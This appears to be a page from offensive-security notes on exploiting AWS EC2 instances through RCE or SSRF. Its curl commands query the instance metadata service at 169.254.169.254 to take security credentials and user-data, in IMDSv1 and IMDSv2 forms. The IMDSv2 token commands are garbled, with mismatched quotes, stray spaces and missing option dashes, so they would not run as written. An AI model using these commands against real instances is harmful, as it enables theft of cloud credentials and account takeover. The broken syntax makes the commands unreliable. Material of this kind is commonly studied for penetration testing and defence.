Exploitation

AWS EC2 Exploitation

Initial Access can happen by RCE or SSRF

Metadata can be used to exfiltrate information from the instance

Remote Code Execution

AWS Metadata

If we have remote code execution or SSRF, we can grab metadata information

curl http://169.254.169.254/latest/meta-data

Grabbing the keys to access the instance

curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials

Grabbing the keys in metadata version 2

TOKEN='curl -X PUT "http://169.254.169.254/latest/ api /token" -H "X-aws-ec2-metadata-token-ttl-seconds:' && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data

AWS Userdata

Version 1

curl http://169.254.169.254/latest/user-data/

Version 2

TOKEN='curl -X PUT "http://169.254.169.254/latest/ api /token" H "X-aws-ec2-metadata-token-ttl-seconds: && curl H "X-aws-ec2-metadata-token: $TOKEN" v http://169.254.169.254/latest/user-data

PreviousAWS EC2 Enumeration NextPersistence

Last updated 7 months ago

hashtagAWS EC2 Exploitation

hashtagInitial Access can happen by RCE or SSRF

hashtagMetadata can be used to exfiltrate information from the instance

hashtagRemote Code Execution

hashtagAWS Metadata

hashtagIf we have remote code execution or SSRF, we can grab metadata information

hashtagGrabbing the keys to access the instance

hashtagGrabbing the keys in metadata version 2

hashtagAWS Userdata

hashtagVersion 1

hashtagVersion 2

AWS EC2 Exploitation

Initial Access can happen by RCE or SSRF

Metadata can be used to exfiltrate information from the instance

Remote Code Execution

AWS Metadata

If we have remote code execution or SSRF, we can grab metadata information

Grabbing the keys to access the instance

Grabbing the keys in metadata version 2

AWS Userdata

Version 1

Version 2